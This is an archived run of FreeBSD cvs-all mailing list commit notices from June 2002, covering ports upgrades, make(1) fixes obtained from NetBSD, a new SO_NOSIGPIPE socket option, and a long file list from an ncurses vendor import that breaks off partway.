Braun Revision Changes Path 1.4 +12 -4 ports/cad/vipec/Makefile 1.3 +1 -1 ports/cad/vipec/distinfo 1.2 +5 -0 ports/cad/vipec/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 11:57:18 2002 Delivered-To: cvs-all@freebsd.org Received: from elvis.mu.org (elvis.mu.org [192.203.228.196]) by hub.freebsd.org (Postfix) with ESMTP id 5E47F37B406; Thu, 20 Jun 2002 11:57:11 -0700 (PDT) Received: by elvis.mu.org (Postfix, from userid 1192) id 2F445AE1C1; Thu, 20 Jun 2002 11:57:11 -0700 (PDT) Date: Thu, 20 Jun 2002 11:57:11 -0700 From: Alfred Perlstein To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/sys socket.h src/sys/kern sys_generic.c uipc_socket.c uipc_syscalls.c Message-ID: <20020620185711.GC74849@elvis.mu.org> References: <200206201852.g5KIqtR45478@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206201852.g5KIqtR45478@freefall.freebsd.org> User-Agent: Mutt/1.3.27i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG * Alfred Perlstein [020620 11:53] wrote: > alfred 2002/06/20 11:52:54 PDT > > Modified files: > sys/sys socket.h > sys/kern sys_generic.c uipc_socket.c > uipc_syscalls.c > Log: > Implement SO_NOSIGPIPE option for sockets. This allows one to request that > an EPIPE error return not generate SIGPIPE on sockets. > > Submitted by: lioux > Inspired by: Darwin Can I get some votes (in private mail please) for MFC'ing this feature? thanks, -Alfred To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 11:59: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5330337B404; Thu, 20 Jun 2002 11:58:56 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KIwuV46245; Thu, 20 Jun 2002 11:58:56 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206201858.g5KIwuV46245@freefall.freebsd.org> From: Ying-Chieh Liao Date: Thu, 20 Jun 2002 11:58:56 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/archivers/fileroller Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/20 11:58:56 PDT Modified files: archivers/fileroller Makefile distinfo Log: upgrade to 1.0.2 PR: 39153 Submitted by: Oliver Braun Revision Changes Path 1.3 +5 -4 ports/archivers/fileroller/Makefile 1.2 +1 -1 ports/archivers/fileroller/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 12: 4:27 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DD1CA37B403; Thu, 20 Jun 2002 12:04:20 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KJ4KI47253; Thu, 20 Jun 2002 12:04:20 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206201904.g5KJ4KI47253@freefall.freebsd.org> From: Ying-Chieh Liao Date: Thu, 20 Jun 2002 12:04:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/deskutils/abacus Makefile ports/deskutils/genius Makefile ports/deskutils/krss Makefile ports/deskutils/narval Makefile ports/deskutils/xopps Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/20 12:04:20 PDT Modified files: deskutils/abacus Makefile deskutils/genius Makefile deskutils/krss Makefile deskutils/narval Makefile deskutils/xopps Makefile Log: Replace ${PERL} with ${REINPLACE_CMD} in PR: 39566 Submitted by: Oliver Braun Revision Changes Path 1.13 +3 -2 ports/deskutils/abacus/Makefile 1.14 +6 -5 ports/deskutils/genius/Makefile 1.2 +2 -1 ports/deskutils/krss/Makefile 1.3 +2 -1 ports/deskutils/narval/Makefile 1.14 +2 -1 ports/deskutils/xopps/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 12:13:23 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 91F3937B409; Thu, 20 Jun 2002 12:13:13 -0700 (PDT) Received: (from okazaki@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KJDDs52555; Thu, 20 Jun 2002 12:13:13 -0700 (PDT) (envelope-from okazaki) Message-Id: <200206201913.g5KJDDs52555@freefall.freebsd.org> From: OKAZAKI Tetsurou Date: Thu, 20 Jun 2002 12:13:13 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/japanese/groff Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG okazaki 2002/06/20 12:13:13 PDT Modified files: japanese/groff Makefile Log: Use ${REINPLACE_CMD} instead of ${PERL}. Revision Changes Path 1.35 +9 -15 ports/japanese/groff/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 12:28:24 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E42D337B433; Thu, 20 Jun 2002 12:28:00 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KJS0X54172; Thu, 20 Jun 2002 12:28:00 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206201928.g5KJS0X54172@freefall.freebsd.org> From: Juli Mallett Date: Thu, 20 Jun 2002 12:28:00 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/make arch.c cond.c job.c parse.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/20 12:28:00 PDT Modified files: usr.bin/make arch.c cond.c job.c parse.c Log: Diff reduction for great justice against NetBSD, cast to unsigned char when passing an argument to isspace(3). Revision Changes Path 1.26 +3 -3 src/usr.bin/make/arch.c 1.20 +1 -1 src/usr.bin/make/cond.c 1.38 +1 -1 src/usr.bin/make/job.c 1.34 +13 -13 src/usr.bin/make/parse.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 12:31:58 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C336037B406; Thu, 20 Jun 2002 12:31:56 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KJVuP55092; Thu, 20 Jun 2002 12:31:56 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206201931.g5KJVuP55092@freefall.freebsd.org> From: Juli Mallett Date: Thu, 20 Jun 2002 12:31:56 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/make arch.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/20 12:31:56 PDT Modified files: usr.bin/make arch.c Log: Expand a buffer to reduce diffs to NetBSD. Obtained from: NetBSD Revision Changes Path 1.27 +2 -2 src/usr.bin/make/arch.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 12:33:51 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2DFA837B401; Thu, 20 Jun 2002 12:33:48 -0700 (PDT) Received: (from okazaki@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KJXmV55231; Thu, 20 Jun 2002 12:33:48 -0700 (PDT) (envelope-from okazaki) Message-Id: <200206201933.g5KJXmV55231@freefall.freebsd.org> From: OKAZAKI Tetsurou Date: Thu, 20 Jun 2002 12:33:48 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/japanese/gxditview Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG okazaki 2002/06/20 12:33:48 PDT Modified files: japanese/gxditview Makefile Log: Use ${REINPLACE_CMD} instead of ${PERL}. Declare USE_AUTOCONF_VER as 213 until bsd.port.mk supports 252 (or later). Revision Changes Path 1.24 +17 -8 ports/japanese/gxditview/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 12:41:45 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4C7DC37B42C; Thu, 20 Jun 2002 12:41:22 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KJfMA56062; Thu, 20 Jun 2002 12:41:22 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206201941.g5KJfMA56062@freefall.freebsd.org> From: Juli Mallett Date: Thu, 20 Jun 2002 12:41:22 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/make dir.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/20 12:41:22 PDT Modified files: usr.bin/make dir.c Log: Look for wildcards, and balanced meta-characters such as { and } like NetBSD does. Obtained from: NetBSD Revision Changes Path 1.24 +18 -2 src/usr.bin/make/dir.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 12:44:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1D7E337B43B; Thu, 20 Jun 2002 12:44:35 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KJiZe56751; Thu, 20 Jun 2002 12:44:35 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206201944.g5KJiZe56751@freefall.freebsd.org> From: Juli Mallett Date: Thu, 20 Jun 2002 12:44:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/make parse.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/20 12:44:34 PDT Modified files: usr.bin/make parse.c Log: Provide a heuristic for RCS conflicts. Obtained from: NetBSD Revision Changes Path 1.35 +9 -2 src/usr.bin/make/parse.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 12:45:28 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9543C37B443; Thu, 20 Jun 2002 12:44:40 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KJiea56776; Thu, 20 Jun 2002 12:44:40 -0700 (PDT) (envelope-from peter) Message-Id: <200206201944.g5KJiea56776@freefall.freebsd.org> From: Peter Wemm Date: Thu, 20 Jun 2002 12:44:40 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/ncurses/ncurses/tinfo lib_termcap.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG peter 2002/06/20 12:44:40 PDT Modified files: contrib/ncurses/ncurses/tinfo lib_termcap.c Log: Merge ncurses 5.2-20020615 changes onto mainline. Revision Changes Path 1.11 +3 -3 src/contrib/ncurses/ncurses/tinfo/lib_termcap.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 12:45:31 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2040C37B413; Thu, 20 Jun 2002 12:42:54 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KJgsl56409; Thu, 20 Jun 2002 12:42:54 -0700 (PDT) (envelope-from peter) Message-Id: <200206201942.g5KJgsl56409@freefall.freebsd.org> From: Peter Wemm Date: Thu, 20 Jun 2002 12:42:53 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/ncurses - Imported sources X-FreeBSD-CVS-Branch: NCURSES Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG peter 2002/06/20 12:42:53 PDT src/contrib/ncurses - Imported sources Update of /home/ncvs/src/contrib/ncurses In directory freefall.freebsd.org:/d/home/peter/nc/ncurses-5.2 Log Message: Import ncurses 5.2-20020615 to fix a first-column display bug. Status: Vendor Tag: NCURSES Release Tags: v5_2_20020615 U src/contrib/ncurses/INSTALL U src/contrib/ncurses/MANIFEST U src/contrib/ncurses/Makefile.glibc U src/contrib/ncurses/Makefile.in U src/contrib/ncurses/Makefile.os2 U src/contrib/ncurses/NEWS U src/contrib/ncurses/README U src/contrib/ncurses/README.emx U src/contrib/ncurses/README.glibc U src/contrib/ncurses/TO-DO U src/contrib/ncurses/announce.html.in U src/contrib/ncurses/config.guess U src/contrib/ncurses/config.sub U src/contrib/ncurses/configure U src/contrib/ncurses/configure.in U src/contrib/ncurses/convert_configure.pl U src/contrib/ncurses/ANNOUNCE U src/contrib/ncurses/install-sh U src/contrib/ncurses/mk-0th.awk U src/contrib/ncurses/mk-1st.awk U src/contrib/ncurses/mk-2nd.awk U src/contrib/ncurses/mkinstalldirs U src/contrib/ncurses/tar-copy.sh U src/contrib/ncurses/dist.mk U src/contrib/ncurses/aclocal.m4 U src/contrib/ncurses/c++/NEWS U src/contrib/ncurses/c++/PROBLEMS U src/contrib/ncurses/c++/README-first U src/contrib/ncurses/c++/cursesapp.h U src/contrib/ncurses/c++/cursesm.cc U src/contrib/ncurses/c++/cursesm.h U src/contrib/ncurses/c++/cursesmain.cc U src/contrib/ncurses/c++/cursesp.h U src/contrib/ncurses/c++/cursslk.h U src/contrib/ncurses/c++/headers U src/contrib/ncurses/c++/modules U src/contrib/ncurses/c++/etip.h.in U src/contrib/ncurses/c++/demo.cc U src/contrib/ncurses/c++/cursespad.cc U src/contrib/ncurses/c++/cursslk.cc U src/contrib/ncurses/c++/cursesapp.cc U src/contrib/ncurses/c++/edit_cfg.sh U src/contrib/ncurses/c++/cursesp.cc U src/contrib/ncurses/c++/cursesf.h U src/contrib/ncurses/c++/cursesf.cc U src/contrib/ncurses/c++/internal.h U src/contrib/ncurses/c++/cursesw.cc U src/contrib/ncurses/c++/cursesw.h U src/contrib/ncurses/c++/Makefile.in U src/contrib/ncurses/doc/ncurses-intro.doc U src/contrib/ncurses/doc/hackguide.doc U src/contrib/ncurses/doc/html/hackguide.html U src/contrib/ncurses/doc/html/ncurses-intro.html U src/contrib/ncurses/doc/html/announce.html U src/contrib/ncurses/form/READ.ME U src/contrib/ncurses/form/fld_arg.c U src/contrib/ncurses/form/fld_attr.c U src/contrib/ncurses/form/fld_current.c U src/contrib/ncurses/form/fld_def.c U src/contrib/ncurses/form/fld_dup.c U src/contrib/ncurses/form/fld_ftchoice.c U src/contrib/ncurses/form/fld_ftlink.c U src/contrib/ncurses/form/fld_info.c U src/contrib/ncurses/form/fld_just.c U src/contrib/ncurses/form/fld_link.c U src/contrib/ncurses/form/fld_max.c U src/contrib/ncurses/form/fld_move.c U src/contrib/ncurses/form/fld_newftyp.c U src/contrib/ncurses/form/fld_opts.c U src/contrib/ncurses/form/fld_pad.c U src/contrib/ncurses/form/fld_page.c U src/contrib/ncurses/form/fld_stat.c U src/contrib/ncurses/form/fld_type.c U src/contrib/ncurses/form/fld_user.c U src/contrib/ncurses/form/form.h U src/contrib/ncurses/form/form.priv.h U src/contrib/ncurses/form/frm_cursor.c U src/contrib/ncurses/form/headers U src/contrib/ncurses/form/frm_data.c U src/contrib/ncurses/form/frm_def.c U src/contrib/ncurses/form/frm_driver.c U src/contrib/ncurses/form/frm_hook.c U src/contrib/ncurses/form/frm_opts.c U src/contrib/ncurses/form/frm_page.c U src/contrib/ncurses/form/frm_post.c U src/contrib/ncurses/form/frm_req_name.c U src/contrib/ncurses/form/frm_scale.c U src/contrib/ncurses/form/frm_sub.c U src/contrib/ncurses/form/frm_user.c U src/contrib/ncurses/form/frm_win.c U src/contrib/ncurses/form/fty_alnum.c U src/contrib/ncurses/form/fty_alpha.c U src/contrib/ncurses/form/fty_int.c U src/contrib/ncurses/form/fty_ipv4.c U src/contrib/ncurses/form/fty_num.c U src/contrib/ncurses/form/fty_regex.c U src/contrib/ncurses/form/llib-lform U src/contrib/ncurses/form/modules U src/contrib/ncurses/form/Makefile.in U src/contrib/ncurses/form/fty_enum.c U src/contrib/ncurses/include/Caps U src/contrib/ncurses/include/MKhashsize.sh U src/contrib/ncurses/include/headers U src/contrib/ncurses/include/nc_panel.h U src/contrib/ncurses/include/unctrl.h.in U src/contrib/ncurses/include/capdefaults.c U src/contrib/ncurses/include/term_entry.h U src/contrib/ncurses/include/nc_alloc.h U src/contrib/ncurses/include/MKterm.h.awk.in U src/contrib/ncurses/include/Makefile.in U src/contrib/ncurses/include/MKncurses_def.sh U src/contrib/ncurses/include/ncurses_cfg.hin U src/contrib/ncurses/include/tic.h U src/contrib/ncurses/include/edit_cfg.sh U src/contrib/ncurses/include/curses.h.in U src/contrib/ncurses/include/MKparametrized.sh U src/contrib/ncurses/include/ncurses_defs U src/contrib/ncurses/include/termcap.h.in U src/contrib/ncurses/include/Caps.aix4 U src/contrib/ncurses/include/Caps.keys U src/contrib/ncurses/include/Caps.osf1r5 U src/contrib/ncurses/include/Caps.uwin U src/contrib/ncurses/include/MKkey_defs.sh U src/contrib/ncurses/include/curses.tail U src/contrib/ncurses/include/curses.wide U src/contrib/ncurses/include/ncurses_dll.h U src/contrib/ncurses/man/curs_addch.3x U src/contrib/ncurses/man/curs_addchstr.3x U src/contrib/ncurses/man/curs_beep.3x U src/contrib/ncurses/man/curs_clear.3x U src/contrib/ncurses/man/curs_deleteln.3x U src/contrib/ncurses/man/curs_terminfo.3x U src/contrib/ncurses/man/curs_bkgd.3x U src/contrib/ncurses/man/curs_getyx.3x U src/contrib/ncurses/man/curs_inch.3x U src/contrib/ncurses/man/curs_addstr.3x U src/contrib/ncurses/man/curs_inopts.3x U src/contrib/ncurses/man/curs_delch.3x U src/contrib/ncurses/man/curs_insstr.3x U src/contrib/ncurses/man/curs_insch.3x U src/contrib/ncurses/man/curs_move.3x U src/contrib/ncurses/man/curs_slk.3x U src/contrib/ncurses/man/curs_overlay.3x U src/contrib/ncurses/man/curs_print.3x U src/contrib/ncurses/man/curs_printw.3x U src/contrib/ncurses/man/curs_instr.3x U src/contrib/ncurses/man/curs_scr_dump.3x U src/contrib/ncurses/man/curs_refresh.3x U src/contrib/ncurses/man/curs_util.3x U src/contrib/ncurses/man/curs_window.3x U src/contrib/ncurses/man/define_key.3x U src/contrib/ncurses/man/form.3x U src/contrib/ncurses/man/form_cursor.3x U src/contrib/ncurses/man/form_data.3x U src/contrib/ncurses/man/form_driver.3x U src/contrib/ncurses/man/form_field.3x U src/contrib/ncurses/man/form_field_attributes.3x U src/contrib/ncurses/man/keyok.3x U src/contrib/ncurses/man/form_hook.3x U src/contrib/ncurses/man/form_new.3x U src/contrib/ncurses/man/form_new_page.3x U src/contrib/ncurses/man/form_field_buffer.3x U src/contrib/ncurses/man/form_field_just.3x U src/contrib/ncurses/man/form_field_new.3x U src/contrib/ncurses/man/form_field_opts.3x U src/contrib/ncurses/man/form_opts.3x U src/contrib/ncurses/man/form_field_userptr.3x U src/contrib/ncurses/man/form_field_validation.3x U src/contrib/ncurses/man/menu_attributes.3x U src/contrib/ncurses/man/form_page.3x U src/contrib/ncurses/man/form_post.3x U src/contrib/ncurses/man/form_requestname.3x U src/contrib/ncurses/man/form_userptr.3x U src/contrib/ncurses/man/form_win.3x U src/contrib/ncurses/man/keybound.3x U src/contrib/ncurses/man/make_sed.sh U src/contrib/ncurses/man/menu.3x U src/contrib/ncurses/man/menu_cursor.3x U src/contrib/ncurses/man/menu_driver.3x U src/contrib/ncurses/man/menu_format.3x U src/contrib/ncurses/man/menu_hook.3x U src/contrib/ncurses/man/menu_items.3x U src/contrib/ncurses/man/menu_mark.3x U src/contrib/ncurses/man/menu_new.3x U src/contrib/ncurses/man/menu_opts.3x U src/contrib/ncurses/man/menu_pattern.3x U src/contrib/ncurses/man/menu_post.3x U src/contrib/ncurses/man/menu_requestname.3x U src/contrib/ncurses/man/menu_spacing.3x U src/contrib/ncurses/man/menu_userptr.3x U src/contrib/ncurses/man/menu_win.3x U src/contrib/ncurses/man/mitem_current.3x U src/contrib/ncurses/man/mitem_name.3x U src/contrib/ncurses/man/mitem_new.3x U src/contrib/ncurses/man/mitem_opts.3x U src/contrib/ncurses/man/mitem_userptr.3x U src/contrib/ncurses/man/mitem_value.3x U src/contrib/ncurses/man/mitem_visible.3x U src/contrib/ncurses/man/resizeterm.3x U src/contrib/ncurses/man/term.7 U src/contrib/ncurses/man/terminfo.head U src/contrib/ncurses/man/wresize.3x U src/contrib/ncurses/man/curs_termcap.3x U src/contrib/ncurses/man/curs_termattrs.3x U src/contrib/ncurses/man/term.5 U src/contrib/ncurses/man/curs_border.3x U src/contrib/ncurses/man/panel.3x U src/contrib/ncurses/man/curs_scroll.3x U src/contrib/ncurses/man/clear.1 U src/contrib/ncurses/man/MKterminfo.sh U src/contrib/ncurses/man/curs_outopts.3x U src/contrib/ncurses/man/infotocap.1m U src/contrib/ncurses/man/curs_kernel.3x U src/contrib/ncurses/man/man_db.renames U src/contrib/ncurses/man/form_field_info.3x U src/contrib/ncurses/man/curs_getch.3x U src/contrib/ncurses/man/curs_pad.3x U src/contrib/ncurses/man/curs_extend.3x U src/contrib/ncurses/man/curs_getstr.3x U src/contrib/ncurses/man/curs_inchstr.3x U src/contrib/ncurses/man/curs_attr.3x U src/contrib/ncurses/man/curs_mouse.3x U src/contrib/ncurses/man/curs_touch.3x U src/contrib/ncurses/man/curs_color.3x U src/contrib/ncurses/man/curs_initscr.3x U src/contrib/ncurses/man/default_colors.3x U src/contrib/ncurses/man/form_fieldtype.3x U src/contrib/ncurses/man/curs_scanw.3x U src/contrib/ncurses/man/captoinfo.1m U src/contrib/ncurses/man/curs_trace.3x U src/contrib/ncurses/man/toe.1m U src/contrib/ncurses/man/Makefile.in U src/contrib/ncurses/man/tic.1m U src/contrib/ncurses/man/infocmp.1m U src/contrib/ncurses/man/tput.1 U src/contrib/ncurses/man/tset.1 U src/contrib/ncurses/man/manlinks.sed U src/contrib/ncurses/man/ncurses.3x U src/contrib/ncurses/man/terminfo.tail U src/contrib/ncurses/man/curs_add_wch.3x U src/contrib/ncurses/man/curs_add_wchstr.3x U src/contrib/ncurses/man/curs_addwstr.3x U src/contrib/ncurses/man/curs_bkgrnd.3x U src/contrib/ncurses/man/curs_border_set.3x U src/contrib/ncurses/man/curs_get_wch.3x U src/contrib/ncurses/man/curs_get_wstr.3x U src/contrib/ncurses/man/curs_getcchar.3x U src/contrib/ncurses/man/curs_in_wch.3x U src/contrib/ncurses/man/curs_in_wchstr.3x U src/contrib/ncurses/man/curs_ins_wch.3x U src/contrib/ncurses/man/curs_ins_wstr.3x U src/contrib/ncurses/man/curs_inwstr.3x U src/contrib/ncurses/menu/READ.ME U src/contrib/ncurses/menu/eti.h U src/contrib/ncurses/menu/headers U src/contrib/ncurses/menu/llib-lmenu U src/contrib/ncurses/menu/m_attribs.c U src/contrib/ncurses/menu/m_cursor.c U src/contrib/ncurses/menu/m_driver.c U src/contrib/ncurses/menu/m_format.c U src/contrib/ncurses/menu/m_global.c U src/contrib/ncurses/menu/m_hook.c U src/contrib/ncurses/menu/m_item_cur.c U src/contrib/ncurses/menu/m_item_nam.c U src/contrib/ncurses/menu/m_item_new.c U src/contrib/ncurses/menu/m_item_opt.c U src/contrib/ncurses/menu/m_item_top.c U src/contrib/ncurses/menu/m_item_use.c U src/contrib/ncurses/menu/m_item_val.c U src/contrib/ncurses/menu/m_item_vis.c U src/contrib/ncurses/menu/m_items.c U src/contrib/ncurses/menu/m_new.c U src/contrib/ncurses/menu/m_opts.c U src/contrib/ncurses/menu/m_pad.c U src/contrib/ncurses/menu/m_pattern.c U src/contrib/ncurses/menu/m_sub.c U src/contrib/ncurses/menu/m_post.c U src/contrib/ncurses/menu/m_req_name.c U src/contrib/ncurses/menu/m_scale.c U src/contrib/ncurses/menu/m_spacing.c U src/contrib/ncurses/menu/m_userptr.c U src/contrib/ncurses/menu/m_win.c U src/contrib/ncurses/menu/menu.priv.h U src/contrib/ncurses/menu/modules U src/contrib/ncurses/menu/menu.h U src/contrib/ncurses/menu/mf_common.h U src/contrib/ncurses/menu/Makefile.in U src/contrib/ncurses/misc/chkdef.cmd U src/contrib/ncurses/misc/cleantic.cmd U src/contrib/ncurses/misc/cmpdef.cmd U src/contrib/ncurses/misc/form.ref U src/contrib/ncurses/misc/makedef.cmd U src/contrib/ncurses/misc/makellib U src/contrib/ncurses/misc/menu.def U src/contrib/ncurses/misc/menu.ref U src/contrib/ncurses/misc/ncurses.def U src/contrib/ncurses/misc/ncurses.ref U src/contrib/ncurses/misc/panel.ref U src/contrib/ncurses/misc/tdlint U src/contrib/ncurses/misc/terminfo.src U src/contrib/ncurses/misc/shlib U src/contrib/ncurses/misc/form.def U src/contrib/ncurses/misc/panel.def U src/contrib/ncurses/misc/indent.pro U src/contrib/ncurses/misc/emx.src U src/contrib/ncurses/misc/Makefile.in U src/contrib/ncurses/misc/run_tic.in U src/contrib/ncurses/misc/tabset/std U src/contrib/ncurses/misc/tabset/stdcrt U src/contrib/ncurses/misc/tabset/vt100 U src/contrib/ncurses/misc/tabset/vt300 U src/contrib/ncurses/ncurses/README U src/contrib/ncurses/ncurses/SigAction.h U src/contrib/ncurses/ncurses/fifo_defs.h U src/contrib/ncurses/ncurses/modules U src/contrib/ncurses/ncurses/curses.priv.h U src/contrib/ncurses/ncurses/llib-lncurses U src/contrib/ncurses/ncurses/Makefile.in U src/contrib/ncurses/ncurses/llib-lncursesw U src/contrib/ncurses/ncurses/base/MKkeyname.awk U src/contrib/ncurses/ncurses/base/README U src/contrib/ncurses/ncurses/base/define_key.c U src/contrib/ncurses/ncurses/base/keybound.c U src/contrib/ncurses/ncurses/base/keyok.c U src/contrib/ncurses/ncurses/base/lib_bkgd.c U src/contrib/ncurses/ncurses/base/lib_scroll.c U src/contrib/ncurses/ncurses/base/lib_chgat.c U src/contrib/ncurses/ncurses/base/lib_clear.c U src/contrib/ncurses/ncurses/base/lib_clearok.c U src/contrib/ncurses/ncurses/base/lib_clrbot.c U src/contrib/ncurses/ncurses/base/lib_clreol.c U src/contrib/ncurses/ncurses/base/lib_colorset.c U src/contrib/ncurses/ncurses/base/lib_delch.c U src/contrib/ncurses/ncurses/base/lib_delwin.c U src/contrib/ncurses/ncurses/base/lib_echo.c U src/contrib/ncurses/ncurses/base/lib_endwin.c U src/contrib/ncurses/ncurses/base/lib_erase.c U src/contrib/ncurses/ncurses/base/lib_getstr.c U src/contrib/ncurses/ncurses/base/lib_scrreg.c U src/contrib/ncurses/ncurses/base/lib_immedok.c U 